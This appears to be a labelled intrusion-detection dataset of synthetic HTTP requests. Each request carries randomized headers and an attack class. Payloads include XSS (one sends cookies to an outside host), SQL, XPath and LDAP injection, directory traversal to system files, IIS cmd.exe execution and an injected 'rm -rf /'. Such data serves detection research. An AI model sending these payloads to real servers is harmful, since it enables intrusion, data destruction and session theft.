GET /XRWm/33LX8yM/edrngbbksfnohb/D8pnetcatmocha/onn7t2itnOzc8me9tfh/e0eUQBIvU2o_YdfA/otcerugil.bin?oi8gdEfhnDa=eRy5&aenzeo7=tpyl7toReasptbt&S5i6e2gionhio=pYbObDRH&ytnio0nu=haee&lh3cloEyncteoei=219643715&ybetweenBkstyleMDbgsoundH3=63&hnaetCno=snoepty&T9irsdtqOttt4r=mtmpil4dt&nuh=6&RyUAV=5120782&6I2HJXeval.YL=%3Cscript%3Ealert++++%28++++%22++++TsWjsafn.ntrn%22%29%3C%2Fscript+++%3E HTTP/1.0
Host: 39.235.175.105
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: O4asae-eudg;q=0.7
Cache-Control: r='eduEoaR'
Client-ip: 211.190.214.99
Cookie: gsMCeEi=whQ;huqlts7srHavcn=w1G;Laccess_logK-x4=btt;uu;ng;gty8YdOvjAnF=nnhivq5;9gDLBHacceptBP=/hhl6zofjo0EcsD
Cookie2: $Version="4"
Date: Sun, 23 Dec 07 17:17:12 CET
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Sat, 13 May 06 06:12:11 GMT
If-Unmodified-Since: Mon, 04 Apr 05 15:57:01 UTC
If-Match: "NVehPK1LeeeuTx6l04eK"
If-None-Match: *
If-Range: "cwt3LXlXUHILH9Pg"
Max-Forwards: 1
MIME-Version: 8.3
Pragma: lCbhoBeh=asresse
Authorization: Digest algorithm=MD5-sess
Range: 248-
Referer: /eisnK/ersaust/oihtlal/ny9n6e.doc
TE: trailers,gzip;q=0.3,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: sSruR/0.9.2.0.2
UA-CPU: MIPS
UA-Disp: 187,5451,16
UA-OS: Windows NT
UA-Color: color8
Via: 5.2 53.22.102.41
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48156
Start - Id: 48396
class: XPathInjection
GET /loYlSr/agmPz7C@mBgynxK.D_h/57n6iiok/iokaad/nofpgk/abrjOl3ph.cfm?aEpymE2etof=rp%7Ce%40%5Dte%3D%29afH%3Bs&evsLsa9wogHgbt=517711 HTTP/1.0
Host: www.7zp5mw.it:80
Connection: aI8i
Accept: text/xml;q=0.1
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: bhriaNz-a5g;q=0.4, tte1tts-eitDt;q=0.4, vsr0gh-oelyt, fr-s1oLt
Cache-Control: no-store
Client-ip: 160.14.116.243
Cookie: rreinetycnn=07030638;uTctb86te0e=i)W)anSloA'sr~r;zfVZYbN=iMmtrldt0tiiao;brAKv8=elnns' or  (i <   count(rkiwn/child::text())   and  j <   count(mae/child::comment())    and    k     <    count(eh/child::*)    )   or     'Bvv'  =    '     e4'  or;vHmailQwp-8_=t
Cookie2: $Version="8"
Date: Tue, 11 Nov 08 11:35:55 CET
ETag: W/"-yI25KGVjmCgJ6e.kTHw"
Expect: 100-continue
From: Eeet7cah@Ioed.uk
If-Modified-Since: Wed, 24 Aug 05 21:32:05 UTC
If-Unmodified-Since: Fri, 18 Nov 05 24:38:39 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Feb 06 12:03:39 UTC
Max-Forwards: 0576
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic dFR1bWV1OllSYnFzZQ==
Authorization: Digest username="ldhtttb"
Range: -645348
Referer: http://www.nmOnsriO.st/vcheqie/gh2mXt/biae/msldis/Fetnwsss.mdb
TE: deflate,gzip;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (X11; U; Linux i386 5.6; hn-id; rv:5.8.9) Gecko/35395109
UA-CPU: 68000
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 827x1746
Via: rteat/0.2 www.n66usr.jpg, 5.3 www.soeooe.png, 0.6 49.147.243.183:5
Transfer-Encoding: identity
Upgrade: an1h/1.1, isai/9.6, maaah/3.4, jOguji/0.1
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 60.162.169.118
X-Serial-Number: 5741877656321
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48396
Start - Id: 36036
class: PathTransversal
GET /czOD4E/ttaeastugie/eHdm17/tiaXDZl5LNh0a.asp?anau7if3ani4tu=eanGcmc&phItN=onp+V&m9QzU=w3ua&iiw2qiXTpilp=%3Asver&c5xF3et=e5%27ano4xsyg%3Adt%3C4d+n&msonRslemjew=sbIpM-PNOX&aeah=dr&tqihotuHl7tio=hqcSS8X8v&76se=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fsestieatto%2Fon%2Fisesni%2Fasas.pl&UUAY2e=5230487&eSwj=Yo68dseadtybn8mre&9ttieminoeahl3=2330408&g0midnroiy5=66865&e2mcrp=4 HTTP/1.0
Host: www.iuNatzt.it
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: compress, identity, gzip;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-stale=8245
Client-ip: 87.93.92.255
Cookie: 3repx9inrRe73A=0314880501
Cookie2: $Version="8"
Date: Wed, 07 May 08 12:08:36 UTC
ETag: "dqM_4UuMnTQ3BNZBkT-X"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 15 Jun 09 22:24:36 GMT
If-Unmodified-Since: Wed, 24 May 06 12:49:29 UTC
If-Match: "KXOfqYbLOulBH9BZM"
If-None-Match: "2eCXn@u.Jlf6W7HsT"
If-Range: Mon, 08 May 06 10:09:37 UTC
Max-Forwards: 81
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: surhtU Telh4=i3hp
Range: 709-485
Referer: /mez1ecAL/1ubapnu/twREs.php
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/5.0 (X11; U; Linux i586 9.5; eg-ta; rv:8.5.6) Gecko/35837397
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: gzip
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36036
Start - Id: 37705
class: LdapInjection
POST /mhsshta6dhw/Wwosd2U8Uea7zhlfhT/4pwrkvSEz/iiatrAiSxSb/hNdAftQ4A02peKjT@/cIbe/smzt/ienbagstapto3alee/eL/deyecT.htm? HTTP/1.0
Content-Length: 316
Content-Language: hOelOKt
Content-Encoding: identity
Content-Location: http://www.wrxeeT.uk/teosaWh/cies8nt4/oga4fua.swf
Content-MD5: cmZhdXQwaG5pZW5ldGhlaw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 16 Feb 05 16:10:25 UTC
Host: 216.234.144.253:87077
Connection: SYraI
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Client-ip: 34.254.110.38
Date: Wed, 02 Mar 05 13:57:10 UTC
ETag: "jBBuDr1MSIeGjB."
If-Modified-Since: Sat, 24 Mar 07 19:03:29 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Mar 06 13:56:01 GMT
Max-Forwards: 118
Pragma: no-cache
Authorization: NTLM bWZ0cm5hbmpqbmR6MW5vN3NyeW5wZG95dGVhaG90bGRlNm9lRW9hZXQ1dzg=
Referer: http://gdGp.st/ahiesi4/Shoeea4/abstttti/eilhrsRg/noftb.php
TE: trailers,trailers
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 3.1; w8-2o; rv:7.9.5) Gecko/83864053
Transfer-Encoding: identity

Elm0nmgtOs5a8M=g&tsef6rsdd5kh=628608&h1=83047386&APusryHVK0F=beiaoa1h&nuS=eeheol&tget8r8gt68=d0ztznniu&o3anOhioY=ieeIh&eokoSzd=oei&7kasnu8Dteegne=21594&duwua8n=tsmOeoreaZo6wbj&ayp= 8sr a jestIN>echo&6Onui=")(targetfilter=(o=NetscapeRoot))&md2i5Elrlgdae=690707918&qu7i=t&ds3&tdo0psdhr=h6ksitapareo

End - Id: 37705
Start - Id: 44309
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 184.195.131.92:9
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1255;q=0.1, windows-1253;q=0.8, euc-kr;q=0.1
Accept-Encoding: gzip;q=0.7, gzip;q=0.2, deflate, identity;q=0.3
Accept-Language: ieo-l;q=0.0, aaw-der;q=0.5
Cache-Control: min-fresh=4
Client-ip: 18.62.79.179
Cookie: dgkliwem=bcbk
Cookie2: $Version="933"
Date: Thu, 13 Oct 05 07:18:13 GMT
ETag: "qNdlMwHthtzDSJln2L"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Fri, 24 Oct 08 09:28:15 GMT
If-Unmodified-Since: Sat, 01 Jan 05 11:06:56 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: "A7c7bTtAgzQPgGqy9qh"
If-Range: *
Max-Forwards: 37
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic YWtubjpvdXJh
Range: 3-
Referer: http://www.uActk.uk/ttnbXwl.mp3
TE: chunked,chunked,gzip
Trailer: Transfer-Encoding
User-Agent: Ekej (lmpuO0k2; oRDdz8Huzr; tMIbq8aK; nz-v1nLTF; ioD1ITJwd5)
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5984x276
Via: FTP/7.2 74.126.183.152, 1.0 www.rlsed9ar.css, 7.1 www.5E3at.js:35
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44309
Start - Id: 48099
class: XSS
GET /wTMtX22XD.quR4Fqo/r8Yd/d7bM/ovlRyT6pAShQKq/h7aeg/nred0i1sdN1swie/GaaaayYeieo.jpg?yhlhisnie=%3Ca+href%3D++++%22+++about%3A%3Cs%26%2399%3Bript%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ilsieses.com%2Fcgi-bin%2Fittensesor.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+%22++++%3E HTTP/1.0
Host: www.iee8booHp.it
Connection: keep-alive
Accept: application/x-tar;q=0.3
Accept-Charset: x-mac-arabic, shift_jis;q=0.3
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: 9-kevwoe3r, ai-e, erluh8-slEr;q=0.3, cXlo-t8z3ie;q=0.5
Cache-Control: max-stale=7
Client-ip: 148.235.193.134
Cookie: cvbscript21JLF._iY= i;ix=LhoVoma;noem=rnh% bxel;CsebbuDudleeru=tfeNsje;qNTinsertMFAoxmlm@=9251908052;HixtMChb=i xSeliLgroup by[9mrexssw
Cookie2: $Version="657"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: W/"AKr90LoeB4iWhbN"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Mon, 26 Nov 07 02:35:05 CET
If-Unmodified-Since: Tue, 15 Nov 05 13:40:12 CET
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: Mon, 03 Mar 08 21:30:01 GMT
Max-Forwards: 4575
MIME-Version: 8.7
Pragma: dhiwoohl='hccrn'
Proxy-Authorization: Basic WmhpbnF3Tzp3czhmZG8=
Authorization: ny9cr sjeOhe=rf9a
Range: -179295,540225-63
Referer: /lonqveth/Rcty.zip
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: qyd_Ub http://www.de7qsci.gov
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: HTTP/0.0 154.129.237.167:80326, 7.9 203.207.173.125, FTP/7.7 166.255.101.160
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48099
Start - Id: 41408
class: SqlInjection
POST /eRMmr/rzJw.0_sC_XgKvSTe/mJh_J0Trn4y57wU/teaomee.js? HTTP/1.0
Content-Length: 275
Content-Language: e,E,sSe9
Content-Encoding: gzip
Content-Location: http://www.ed5iipe.net/euux.php3
Content-MD5: eWZzdE1zZWVqZTdvYUl0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Sun, 11 Apr 04 07:16:14 UTC
Host: 50.9.94.253
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.1
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 199.178.94.59
Cookie: J3processing-instructionS=c=rtt;meiaeond17zstg= b;d1efOhtooe=%itr3Mv2tstdindbvhi4;inz0Oet3Rmanar=r?dmed&eno;BWsDshutdownYROW4Nt=1hmhttpsNeb4a
Cookie2: $Version="59"
Date: Tue, 17 Oct 06 22:41:14 GMT
ETag: W/"RXW5dU6ImVA12N4s"
Expect: 2ecTeaoj=nIjI3BR
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 02 Sep 08 22:06:57 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: *
If-None-Match: "MceWUSOt7uE07y1"
If-Range: Sun, 16 Jan 05 06:26:13 CET
Max-Forwards: 9
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM YWllaGhlbmR0aHM0dDRlNHRhNkVhZG94aWlmY3VLYXJjbmEzZGFyZTJ0cw==
Range: 24-
Referer: /m5k4cas/htnola/1tll.jpg
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: tsfl (s7bD_uc)
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: slrjs/2.3 www.t9enlmoP.tiff, 2.4 www.dtoot9.html
Transfer-Encoding: identity
Upgrade: etntne/4.1, Iossd/8.2
Warning: 883 164.170.254.130 "nAGe9a" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

is3arxmoeuszr=|H&hengnjrGoerOi=veadmintmpease&acnhoiasv1r=rFW.0U&3e9hsxsr8lcfdum=OR   'iftao7oie4' =    '    '&boot.inimfgroup byYUdivq71=303&@Athaving5l9=05456&7carit=Iar&LdropLKFXGKrH=ec&ooita7h=30&wBincludefGhtaccesoZinputJ5=olhm;&s3LK=33250&amheeeia=7253283

End - Id: 41408
Start - Id: 43574
class: OsCommanding
GET /wKJbJR53bS/57OZ/k3/dgt0tsqgeanpoFIYicr/r1j/gF4.0zR0.RgS/E9fUCUFexec/nPXDT.sh?byiaoSyf=h%3Dd+Y%28Ao%7Cponiimglhdropd4a&oddej16trt=er%3A%25%3A&ol7viNcaeei=%7Cecho++++%22++++Content-Type%3A+text%2Fhtml%22++++%3B+echo+%22%22+++%3B++++id+%5C0&20e=+aT2+atsn HTTP/1.0
Host: www.endi0csn.gov:80
Connection: anetoe
Accept: video/quicktime, image/gif, audio/*;q=0.7
Accept-Charset: euc-kr;q=0.8, gb2312;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 82.204.119.168
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="95"
Date: Fri, 07 Oct 05 10:09:17 UTC
ETag: "z@VDwv-LBAonIc6"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 10 Jun 06 21:14:32 CET
If-Unmodified-Since: Fri, 12 Sep 08 10:25:18 GMT
If-Match: *
If-None-Match: *
If-Range: "jHWj2jPaWJQGE_m8BU9"
Max-Forwards: 6245
MIME-Version: 5.9
Pragma: no-cache
Authorization: NTLM bmlkZWptaWhnc2xldWFuZXJ0ek51RGR0NWdsZUhyTzJpZWR1WGlOcHQz
Range: 08647-744
Referer: /bmapfach/qoyb/aoeFw/oIss.css
TE: trailers
Trailer: Host
User-Agent: 8hsg/7.0.7.7
UA-CPU: PowerPC
UA-Pixels: 1267x2165
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: compress

null

End - Id: 43574
Start - Id: 40498
class: SSI
GET /saueEiaais/K6.9Mmocha_Exterm/alyokZl/eu3M1qqRg9R3u99qQft/ecfAtdlhd7o/ehmia7kdyfenXsewyav/ij/VK/ei3eliennrolaostA0y/dLJX0B9UPyB1kU_U@EfK.aspx?7otaonrradMqin=%284+c+8t&mtTdbkwsjf=tT&duccbsrnSntee2g=sd+cd&ri2vneml=%3C%21--+++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&40gYMqYkmailH3exec=aWKWJJ6r2jI&eosedst1e5=Imheavggroup+byyhmi HTTP/1.1
Host: 233.2.162.39
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: identity
Accept-Language: roe8kj0-leebk, t-w4e;q=0.9, tt-xe
Cache-Control: max-age=8075
Client-ip: 23.11.134.211
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="148"
Date: Sat, 04 Apr 09 02:05:11 UTC
ETag: W/"tQ..TqsAmpq4am6OZRoc"
Expect: 100-continue
From: wsWpne@sapo.cz
If-Modified-Since: Mon, 01 Jan 07 24:41:04 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: "yX6.nEjya0vofiyA"
If-None-Match: "bd97IbNty08ArTR508"
If-Range: "yzK9@p82nkS8bPN"
Max-Forwards: 3693
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: 8620-2,-84982
Referer: http://www.s0wzc.be/ieoaan/6aur/heshj51.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 5.1; nr-fa; rv:4.1.0) Gecko/55257869
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0287x026
Via: 9.1 www.evotIvi.tiff:08371, HTTP/2.9 110.159.178.233
Transfer-Encoding: identity
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40498
Start - Id: 49627
class: XPathInjection
GET /eZxqOy5/9H._n7bodycysZN/aA7hy3W-hK0_gwW2_dv1/es/sufsOrta/ena.js?nneoEtseiea2=libiyastdinnnoel+mrcpi&omrattmailottte=2hz1MooE%27++or++1%3C++i%2Fean3St%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D221%5D++++or+%27cguxeFos%27++%3D%27&mr=048&BlocationddemhTql9=ps%26&2w9s=ye1arslut%7Cn&seEsis=Acrs7unnxdp&tfod=73786&RAeinC=ari4&ivtie=iuorreo&kQuV=5475421 HTTP/1.1
Host: 4.178.239.244
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.8, windows-1258;q=0.9, windows-1254;q=0.8, x-mac-arabic, koi8-r;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 228.117.156.249
Cookie: dmrbndwexi=hcyO;og90bi=Msaeinosi;edtbUsS=e'stsyAeS;bodyY2YTTiframeda=g6iHsysfmetaUs;jKOX=6468345432;h5pXOfS=mnGX-_4LYadm
Cookie2: $Version="34"
Date: Sun, 13 Jun 04 11:03:58 CET
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sat, 30 Dec 06 24:31:46 GMT
If-Unmodified-Since: Sun, 26 Jun 05 24:22:49 CET
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: NTLM aGJuZWl0c3NzOXBwa2lyZnJiaHNhYTRBQm9VcGVhaG5rcw==
Range: 31-025167,936-84
Referer: http://udnet.it/g5mgf.fgf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: sZdnwnIee/3.7.4.4.7
UA-CPU: StrongARM
UA-Disp: 177,5703,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 1.2 www.ebtie.tiff
Transfer-Encoding: tedco; rtyeddya=lochU
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49627
Start - Id: 43138
class: OsCommanding
GET /s8qRz8Vi-xIQ_tPZIs/pXugCDwJXUAXZmxy/eCw/IeNsJ-4haEFj/uXc.I-zAHMAE9H5J14hH.htm?tfaapnd=5aia2pahneexeca%3Aad+%5C&artsa6us2le=hyncneerSEeYea&mytNaTeO3=528534&gcSk2iGKkLu=%60+rm+-rf+++%2F++++%60&wwebhhnsy=%3B%24sta&_F1xTUDjZm48=qdogca0dltnEtn&E64x=28&nttinkayr5uuurs=153720&Xoaida0P8thk=9244261735&eqnnhm=467059062 HTTP/1.0
Host: 141.104.48.180
Connection: close
Accept: video/quicktime, text/*, text/*
Accept-Charset: x-mac-arabic;q=0.5, cp-936;q=0.4, x-mac-arabic, iso-2022-jp, windows-1257;q=0.5
Accept-Encoding: gzip;q=0.2, identity;q=0.0, gzip;q=0.9, identity;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 55.189.197.20
Cookie: Etm96=np4nnetornepm;TbkFe2YqA=A;2VZ46hVQP=snihd &loa;ltt=tet|nodenselect+eacmhmO7ohW
Cookie2: $Version="5"
Date: Wed, 23 Mar 05 21:49:28 UTC
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ndud@rzo8frE.cz
If-Modified-Since: Fri, 08 Oct 04 21:29:52 UTC
If-Unmodified-Since: Sat, 28 Nov 09 17:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: "1NKtFMcmTxI39hB"
Max-Forwards: 3536
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: rates2 ipii1rie=esrrf
Range: 06-14835,74438-28398,3461-5
Referer: http://hlMtei.de/2ihcnn/5dkyuNrA/t2emeyn/5nbAjM/y4jlk.jpeg
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 5.3; tr-ht; rv:4.1.8) Gecko/65809994
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.8 www.mvd5jheh.js:04767, HTTP/4.2 161.95.194.78
Transfer-Encoding: identity
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 413241650
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43138
Start - Id: 45581
class: PathTransversal
GET /noeleeruods/scmAr/QAz/eKz_9p_7g/cxB3/sIIoeudohmhnrwti0/tp4vnbscEdhete/oYPV5/rCzqU6JlJ5WgjY.bin?tqukthdxItgivwu=tSPJiZ&eean4=884101&HncblPTmncJ8=%2Be%28&olnlnttrsxsdrtt=%27bea+aTE%7C&neiuongeiRur4=aJu&nyiinutTdc=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&rtmnijWiOruFq=ebobeps7wa+uia&9eauc1nE=qhtim%7Ci&BgUdINFcphpWwp-t=eihbu&1af41eo9onree=nf6o HTTP/1.1
Host: www.neeaehthz.ch:80
Connection: 8ubtd
Accept: video/mpeg;q=0.6, text/*, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip;q=0.1, deflate;q=0.3, identity;q=0.4
Accept-Language: nulLNr-iehT;q=0.6, fahyxlti-8dnenury;q=0.2, teim-s3no;q=0.5, nzga-m;q=0.3, i4ochnfz-vo3hOacd;q=0.8
Cache-Control: no-cache
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Fri, 22 May 09 03:55:55 CET
ETag: "W@5PqyMvVxHHDy-"
Expect: 100-continue
From: wtdlbok@elsFbheed.st
If-Modified-Since: Wed, 07 Jun 06 04:26:18 CET
If-Unmodified-Since: Thu, 29 Nov 07 16:26:04 UTC
If-Match: "WePpOAJRMlqnhUwGs3t"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 2.5
Pragma: DQ='ueiti'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: 286-378831
Referer: http://www.ssyMnr.st/dnoa/S3t26ttH.msf
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 6.1; E4-0o; rv:4.3.1) Gecko/12228804
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45581
Start - Id: 43864
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.oho3.de
Connection: o5twnseO
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=8634
Client-ip: 134.7.129.167
Cookie: deahOtuIelL=sngmhdr;n2d=efs.Ho.frOTK;rensaytiinyhaga=em4epsTcufRae;h2eUimhkeh=sa%I;relerBkczmou=onl;b09EY292=5Dehtaccesf:md
Cookie2: $Version="8"
Date: Mon, 02 Feb 09 10:10:51 CET
ETag: "dGEC@BIj22_xTSaE@"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 22 May 06 14:23:51 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: *
If-None-Match: "ZJLZhg2yTBia3IW"
If-Range: "9t8q.lpW3Y5FWcRyL"
Max-Forwards: 2336
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic aGhlaEdhaDpoN1RzYXJ0ZQ==
Range: 91796-,027282-114595
Referer: http://lvdr.be/nsy4/wmte7ie/riaopN/g10adcnh.php
TE: trailers
Trailer: User-Agent
User-Agent: hsoBsEa/8.0.6
UA-CPU: Sparc
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: gZ1naf/1.2 www.whufar.js
Transfer-Encoding: identity
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 271 62.138.196.100 "8z8l8ou" "Tue, 21 Feb 06 05:57:12 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43864
Start - Id: 48136
class: XSS
